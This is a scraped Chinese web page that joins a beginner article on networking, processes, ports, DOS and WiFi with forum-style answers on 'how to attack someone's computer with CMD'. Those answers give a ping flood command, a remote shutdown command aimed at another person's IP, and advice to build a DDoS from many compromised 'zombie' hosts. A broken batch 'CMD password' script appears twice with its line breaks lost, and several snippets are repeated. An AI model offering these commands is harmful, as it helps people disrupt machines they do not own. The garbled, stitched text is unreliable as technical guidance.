全零和全1的地址禁止使用,全零代表本网络,而全一是广播地址(在CISCO上可以使用全零地址)常用的是ABC这三类地址。2.认识进程所谓进程便是程序在计算机上的一次执行活动。开始运行一个程序时,就启动一个进程。进程还分为系统进程和用户进程。凡是用于完成操作系统的各种功能的进程就是系统进程,且时处于运动状态下的操作系统本身;用户进程就是所有用户启动的进程。进程是操作系统进行资源分配的单位。3.端口是计算机和外界通信交流的出口。硬件领域的端口又称为接口,如USB端口,串行端口等。软件领域端口一般指互联网中面向连接服务和无连接服务的通信协议端口,是一种抽象的软件结构,包括一些数据结构和i/o(基本输入输出)缓冲区。端口是传输层的内容,是面向连接的,对应网络上常见的一些服务,这些常见的服务可以划分为TCP端口(面向连接,如打电话)和使用UDP端口(无连接,如写信)两种。4.虚拟机环境黑客无论是在测试和学习黑客工具的操作方法还是在攻击时候,不会拿实体计算机来尝试,而是在计算机中搭建虚拟环境,即在自己已在的系统中,利用虚拟机创建一个内在的系统,该系统可以与外界独立,但与已经存在的系统建立网络关系,从而方便使用某些黑客工具进行攻击模拟,并且一旦黑客工具对虚拟机造成破坏,也会很快就会恢复,不会影响本来的计算机系统,使得操作更安全。二:1.window系统的命令行服务器管理 和网络管理是系统和网络管理者的主要内容。window系统本身 就带着一些病毒和受残损的文件,常使用户无法正常工作。但是熟练掌握命令行的使用方法,能保障计算机系统的安全性能。2.Dos系统dos是一组控制计算机 工作的程序,专门用来管理计算机中各种软件,硬件资源,负责监视和 控制计算机的全部工作过程。向用户提供了一整套使用 计算机系统的 命令和方法,还向用户提供了一套组织和应用磁盘上信息的方法。dos的 功能:执行命令和程序:当用户键入合法命令和文件名后,dos就根据文件的存储地址到内存 或外存上查找用户所需的程序,并根据用户的 要求使得CPU运行,否则则出现出错信息 ,告诉用户服务,在这里,cpu承担了使用者,计算机,应用程序三者之间的中间人。内存管理:分配内存空间,保护内存,使得任何一个程序所占的空间不遭到破坏,同硬件相配合,可以设置一个最佳的操作环境。设备管理:为用户提供使用各种输入或输出的设备(如键盘,磁盘,打印机,和显示器等)的操作方法。可以通过dos方便的实现内存和外存之间的数据传送和存取。文件管理;为用户提供一种简单的存取和管理信息方法。通过dos管理文件目录,为文件分配磁盘存储空间,建立,复制,删除,读/写和检索各类文件等。作业管理:作业是指用户提交给计算机系统的一个独立的计算任务,包括源程序,数据和相关命令。作业管理是对用户提交的诸多作业进行管理,包括作业的组织,控制和 调度等。文件与目录:文件是存储于外存储器中具有名字的一组相关信息集合,在dos下的所有程序和数据都是以文件形式存入磁盘。自己编制的存入磁盘的程序就是文件。执行dos 外部的命令就调用此命令文件的过程。内部命令隐藏在dos的io.sys和msdos.sys中,当dos启动计算机时候使用者输入一个dos 命令时候,该指令先交由command.com分析,所以command被称为命令处理器,其功能就是判断使用者 所输入的指令是内部命令还是外部命令。若是内部,交给io.sys或msdos.sys处理,反之则到磁盘上找寻该档案,即执行该指令。WiFiWiFi实际上是一种高频无线电信号,它是 一种可将个人计算机。手机等终端以无线方式互相连接的技术。无线网络在无线局域网上的范畴内是指“无线相容性认证".实质上是一种商业认证。也是无线联网技术。以前通过网线连接计算机,而无线保真则是通过无线电波来联网。常见的就是用一个无线路由器,在这个无线路由器的电波覆盖的有效范围内就可以采用无线保真方式进行联网,若无线路由器连接了一条ADSL的线路或者别的上网线路,电脑的无线路由器的参数设置。192.168.1.1连接问题:手机连不上路由器,可能是手机连接该无线路由器的无线信号,并且在手机上保存了无线网络的配置文件,但是改变了无线路由器的加密方式或者密钥。手机不能自动连接到该信号,需要先删除原有的无线配置文件再重新连接。若是手机无线显示已连接,但是不能上网,可能是手机的IP地址等参数配置错误。推荐使用默认的自动获取默认的IP地址。作者:笑雅雅链接:https://www.jianshu.com/p/e51947fe4241来源:简书 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
最简单的 ping ip -t -l 65500
如何用CMD攻击别人电脑
首先,电脑的系统要相同(这样防火墙的等级相同); 其次,所针对的电脑要在一个网域;方法:开始菜单—运行—输入CMD—回车,然后在打开的命令提示符窗口中输入:shutdown -s -m \ip地址 ,回车即可。具体命令,参照:http://zhidao.baidu.com/question/1817633159546503908.html?fr=iks&word=cmd%B9%A5%BB%F7%C3%FC%C1%EE&ie=gbk
楼上那个是应该用记事本写,不好在CMD命令下写的 而且只是加密CMD,防止别人攻击时调用自己的命令工具建议先熟悉一下各种命令 比如同时用多台主机ping一个地址,构成一个简单的ddos攻击,当然前提是你必须有足够的肉鸡
今天给大家做一个加密CMD防御入侵攻击的教程 简单的几句命令就可以搞定了,没有设么技术含量《希望大家都能在平凡的操作中能发现一些意想不到的技巧》 @echo offcolor aclsprompttitle 啊祥专用set pass=0set times=0echoechoecho:startset /p pass=想进入此程序请输入CMD密码:if %pass%==keai goto okif %times%==0 goto endset /A times=%times%-1:endexitcls:oktitle 啊祥专用 保存为*.BAT可就可以了
楼上那个是应该用记事本写,不好在CMD命令下写的 而且只是加密CMD,防止别人攻击时调用自己的命令工具建议先熟悉一下各种命令 比如同时用多台主机ping一个地址,构成一个简单的ddos攻击,当然前提是你必须有足够的肉鸡
今天给大家做一个加密CMD防御入侵攻击的教程 简单的几句命令就可以搞定了,没有设么技术含量《希望大家都能在平凡的操作中能发现一些意想不到的技巧》 @echo offcolor aclsprompttitle 啊祥专用set pass=0set times=0echoechoecho:startset /p pass=想进入此程序请输入CMD密码:if %pass%==keai goto okif %times%==0 goto endset /A times=%times%-1:endexitcls:oktitle 啊祥专用 保存为*.BAT可就可以了
本文由 在线网速测试 整理编辑,转载请注明出处。
